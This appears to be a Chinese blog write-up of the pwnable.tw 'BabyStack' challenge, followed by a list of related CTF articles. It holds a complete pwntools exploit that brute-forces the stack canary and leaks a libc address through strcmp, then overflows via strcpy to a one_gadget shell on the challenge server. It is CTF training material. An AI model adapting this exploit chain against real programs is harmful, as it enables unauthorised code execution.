pwnable tw BabyStack writeup

最新推荐文章于 2023-05-27 01:19:05 发布
最新推荐文章于 2023-05-27 01:19:05 发布
阅读量1.5k 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/charlie_heng/article/details/79426755
版权

这题做得好难受…..

首先漏洞很明显是strcpy那里,可以strcpy超过0x3f个字符串

然后login,以\x00开头的话,就可以过login了

一开始我是想先泄漏程序的其中一个地址,然后利用stackOverflow 来rop一波的,然后发现,strcpy只能复制到\x00前,所以只能用one_gadget 来一发get shell

但是这里还有canary要过,这里很明显就是利用strncmp来爆破

但是one_gadget还要泄漏libc地址,这里就想了我好久…..

调着调的时候发现调用copy的时候,栈上面很多剩下的libc地址,这样就可以利用strcpy顺带copy到 canary后面,然后用login的strcmp来泄漏出来,最后one_gadget 一发get shell

下面是payload,可能要跑大概10分钟….
ps : 这估计是pwnable tw放的最后一个wp吧……因为网站上要求不要放高分题目的wp和poc,所以如果想交流交流后面题目的可以留言一下,不过我没做到的估计也回答不了………

from pwn import *

debug=0
e=ELF('./libc.so')
one_offset=0xf0567
if debug:
    p=process('./babystack',env={'LD_PRELOAD':'./libc.so'})
    context.log_level='debug'
    gdb.attach(proc.pidof(p)[0])
else:
    p=remote('chall.pwnable.tw', 10205)
    context.log_level='debug'


def ru(x):
    return p.recvuntil(x)

def se(x):
    p.send(x)

def login(pwd,lo=True):
    if lo:
        se('1'+'a'*15)
    else:
        se('1')
    ru('Your passowrd :')
    se(pwd)
    return ru('>> ')

def logout():
    se('1')
    ru('>> ')

def copy(content):
    se('3'+'a'*15)
    ru('Copy :')
    se(content)
    ru('>> ')

def Exit():
    se('2')

def guess(length,secret=''):
    for i in range(length):
        for q in range(1,256):
            if 'Success' in login(secret+chr(q)+'\n',False):
                secret+=chr(q)
                logout()
                break
    return secret

secret=guess(16)

login('\x00'+'a'*0x57)
copy('a'*40)
logout()
base=u64(guess(6,'a'*16+'1'+'a'*7)[24:]+'\x00\x00')-324-e.symbols['setvbuf']

one_gadget=base+one_offset

payload='\x00'+'a'*63+secret+'a'*24+p64(one_gadget)

login(payload)

copy('a'*0x30)

Exit()

print(hex(base))

p.interactive()
charlie_heng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwnabletw-babystack
qq_41667316的博客
12-25 1721
BabyStack 思路 危险函数,strcpy。 在copy的时候strcpy看似没有问题,但是由于src的内容并没有清空,还保存着被销毁栈的原有数据,而strcpy是根据"\x00"来判定的,所以造成了栈溢出。 login的限制可以用"\x00"绕过。 首先通过login函数中的strcmp,把canary值爆破出来。 然后利用copy函数栈上的垃圾数据中保存的一些libc的相关地址,将其拷贝到canary的地址,然后继续爆破,就可以得到libc的机制。 给了libc,一发one_gadget。 e
【PWN · ret2text】[BJDCTF 2020]babystack
Mr_Fmnwon的博客
04-20 724
作为pwn新手,尽可能在刷题中,记录、学习一些通用的知识点,因此wp是少不了的。本题是一道简单的ret2text。
Babystack
pppp974的博客
08-19 477
#!/usr/bin/env python from pwn import * elf=ELF('./babystack') libc=ELF('./libc-2.23.so') p=remote('111.198.29.45',30865) prdi_addr=0x400a93 main_addr=0x400908 one_gadget=0x45216//找到库中('bin/sh')的相对地址 ...
XSCTF联合招新赛(热身赛)babystack & easyrop
红叶的博客
10-29 1582
开启了栈不可执行,但是在 IDA Pro 中发现了backdoor函数。
BUUCTF-pwn(8)
njh18790816639的博客
12-29 517
2023 强网杯 Writeup
最新发布
01-29
2023 强网杯 Writeup
古典加密writeup
01-05
做CTF时遇到的古典加密的问题,自己写的writeup,信息安全专业的
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。...
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
pwnable.tw 9 seethefile [250 pts]
qq_42192672的博客
12-04 759
之前做了五道题直接做自闭了,各种手写shellcode,学到了很多姿势,这是一道文件题,没接触过,来挑战一下…… no canary found!!!!!! 拖进IDA分析 一共有五个功能 有一个明显的栈溢出 我们可以通过溢出name来覆盖fp 1)openfile:打开文件,文件指针就是fp,不能打开文件名为flag的文件 2)readfile:从fp读取0x18F个字节...
【PWN · IntegerOverflow & ret2text】[BJDCTF 2020]babystack2.0
Mr_Fmnwon的博客
05-27 889
整数溢出漏洞——对于有/无符号数,长/短位宽转换时机器码的变换策略所指。整数溢出一般与其他堆栈溢出相结合,然而其中的内容其实远不止这些,还需要深层次刷题,进一步掌握了解整数溢出。
攻防世界babystack(pwn1)——glibc_all_in_one初体验
weixin_48066554的博客
05-14 1299
攻防世界babystack(pwn1)——glibc_all_in_one初体验 文章目录攻防世界babystack(pwn1)——glibc_all_in_one初体验引入初步分析1、checksec2、伪代码分析3、栈分析解题思路1、泄露canary3、get shellexp本地libc运行尝试尝试1尝试2尝试3尝试4(重大进展) 引入 ​ 好久没做pwn题了,找了道简单的ret2libc做做,顺便尝试解决一些历史遗留问题 (其实就是让pwn题使用本地的libc的问题,省流:有突破性进展但没有完全解决
pwnable tw Starbound writeup
charlie_heng的专栏
03-02 907
这题漏洞很明显,选择菜单的时候可以输入负数,然后可以在name那里填入想调用的函数,这样就可以实现任意地址执行 但是有了这个之后怎么用呢?? 这个就有点难度了,本来是想看一下栈,看看有没有可以用的参数,但是发现基本都用不了……. 然后想了下,这题没有给libc,又没有system,那么多半是ret2dl_resolve 那么ret2dl_resolve又需要rop,那么这题应该就是rop了...
pwnable.tw-2018-starbound_writeup
CabbageWind的博客
08-17 435
题目:Pwnable.tw-starbound 解法1:ret2libc 1.进入程序进行观察: 这是一个交互小游戏,存在多处用户输入的位置,很有可能存在栈溢出漏洞。 2.查看文件保护状态: 3.使用IDA中查看文件内容: 这个文件较之平时的其他题目代码量大了很多,存在许多输入位置,但是找了一圈没有可以直接利用的栈溢出漏洞。 4.在反汇编代码中发现一个逻辑漏洞: 在用户输入时,程序只对输入值进行了strtol()处理,并把该值作为数组下标,也就是说对于输入的数字只要不为零都是可以利用p_choice
【CTF】bjdctf_2020_babystack 1
凉水的博客
01-21 1226
解题思路: 1 先反编译: undefined8 main(void) { undefined local_18 [12]; uint local_c; setvbuf(stdout,(char *)0x0,2,0); setvbuf(stdin,(char *)0x0,1,0); local_c = 0; puts("**********************************"); puts("* Welcome to the BJDCTF! *
[buuctf]bjdctf_2020_babystack
逆向萌新的博客
06-19 608
[buuctf]bjdctf_2020_babystack
从0ctf2018 babystack学习return to dl-resolve
极目楚天舒的博客
05-06 1807
0x01程序分析首先查看main函数,比较简单,调用了alarm和sub_80483B,进入sub_80483B看看。sub_80483B的作用是读取0x40个字节到ebp-40处,这里显然存在栈溢出漏洞。发现只开了一个栈不可执行,于是想构造rop链。但是整个文件搜索下来也没有发现什么有价值的gadget。0x02  return to dl-resolve知识学习玩过pwn的赛棍都知道,pwn题...
iscc2015官方writeup
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值